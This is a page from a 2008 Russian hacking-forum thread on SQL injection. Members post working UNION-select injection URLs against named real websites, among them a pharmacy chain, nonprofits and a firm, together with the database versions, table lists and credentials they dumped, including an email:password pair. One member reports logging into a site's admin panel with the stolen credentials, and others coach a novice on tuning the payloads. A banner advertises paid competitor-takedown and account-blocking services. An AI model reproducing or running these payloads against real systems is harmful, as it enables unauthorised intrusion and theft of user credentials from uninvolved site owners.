SQL Инъекции — ANTICHAT Forum

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 507 из 1602

507

Опции темы

Поиск в этой теме

Опции просмотра

22.03.2008, 22:11

samarin

Участник форума

Регистрация: 24.02.2008

Сообщений: 136

Провел на форуме:
295283

Репутация: 69

Только учусь!
Сеть аптечных магазинов!

Цитата:

http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,4,5/*#s576

5.0.22-log
zdplus@localhost
---------------------------------
information_schema.tables

Цитата:

http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,table_name,5+fr om+information_schema.tables/*#s576

админка

Цитата:

http://zdorovie-plus.com/adm/login.php

------------------------------------------
Много чего не понятного, прошу на обсуждение в вопросы по уязвимостям
------------------------------------------
все только в учебных целях

Последний раз редактировалось samarin; 22.03.2008 в 22:46..

23.03.2008, 00:27

Muhacir

Участник форума

Регистрация: 05.10.2006

Сообщений: 133

Провел на форуме:
548338

Репутация: 165

Цитата:

Сообщение от samarin

Только учусь!
Сеть аптечных магазинов!

5.0.22-log
zdplus@localhost
---------------------------------
information_schema.tables

админка

------------------------------------------
Много чего не понятного, прошу на обсуждение в вопросы по уязвимостям
------------------------------------------
все только в учебных целях

http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,usr,3,pwd,5+from+zd p_usr/*
user: *****
pass: *****
+ заходит.

23.03.2008, 00:58

Jokester

Познавший АНТИЧАТ

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Muhacir
тебе делать нечего? человек написал:
"прошу на обсуждение в вопросы по уязвимостям"
Как ты думаешь зачем?Там полтора часа назад то_же самое обсуждали

23.03.2008, 01:40

Sharingan

Участник форума

Регистрация: 05.05.2007

Сообщений: 171

Провел на форуме:
1050662

Репутация: 435

Код:

http://www.canadahaitiaction.ca/local.php?id=-6+union+select+1,concat(email,0x3a,pass)+from+Members+limit+0,1/*

digitalindependence@riseup.net:shawn

Код:

http://www.furthernoise.org/index.php?iss=-6+union+select+1,concat(name,0x3a,pass)+from+fn_users/*

Andy:‰ ÿ@bå®½I™Þ_ˆý о_О какой то странный пароль

Код:

http://ukmoths.org.uk/show.php?id=-75+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,concat(version(),0x3a,database(),0x3a,user()),16/*

4.1.19-standard-log:ukmoths:ukmoths@server213-171-218-204.livedns.org.uk

23.03.2008, 13:40

CaNNabi$

Познающий

Регистрация: 21.01.2008

Сообщений: 85

Провел на форуме:
839509

Репутация: 338

http://www.ococtexas.org/

Код:

http://www.ococtexas.org/page.php?id=0x3327%20union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11/*

Код:

5.0.45-community-nt:ococ@localhost:ococ

Код:

http://www.ococtexas.org/page.php?id=0x3327%20union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11%20FROM%20INFORMATION_SCHEMA.TABLES%20--

Цитата:

• CHARACTER_SETS
• COLLATIONS
• COLLATION_CHARACTER_SET_APPLICABILITY
• COLUMNS
• COLUMN_PRIVILEGES
• KEY_COLUMN_USAGE
• PROFILING
• ROUTINES
• SCHEMATA
• SCHEMA_PRIVILEGES
• STATISTICS
• TABLES
• TABLE_CONSTRAINTS
• TABLE_PRIVILEGES
• TRIGGERS
• USER_PRIVILEGES
• VIEWS
• age
• call_track
• contract_time
• cp_user
• family
• group
• hear_from
• kids
• language
• message
• news
• race
• reason
• static_page
• status

http://www.ztocapital.com/

Код:

http://www.ztocapital.com/Page.php?id=-1'%20union+select+1,2,3,4,5,6,7,8,9/*

5.0.45-community-nt:zto@localhost:zto

23.03.2008, 15:40

mff

Познавший АНТИЧАТ

Регистрация: 12.03.2008

Сообщений: 1,379

Провел на форуме:
5866479

Репутация: 1809

Ребят, помогите, скуль на запрос "id=9999+union+select+null,null,null/*" выдает такое сообщение - "The used SELECT statements have a different number of columns", а я ЛОХ непойму что делать...

23.03.2008, 15:42

~~Piflit~~

Banned

Регистрация: 11.08.2006

Сообщений: 1,522

Провел на форуме:
5128756

Репутация: 2032

mff количество выводимых полей не подходит. юзай другое. например, select 1,2/* select 1,2,3/* итд. пока не исчезнет эта ошибка. вообще, есть другая тема.

23.03.2008, 15:49

mff

Познавший АНТИЧАТ

Регистрация: 12.03.2008

Сообщений: 1,379

Провел на форуме:
5866479

Репутация: 1809

Цитата:

Сообщение от Piflit

Спасибо Piflit, буду пробывать! Тут вот еще выдали на запрос "id=9999'+union+select+1,2,3/*" - "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' union select 1,2,3/*' at line 1"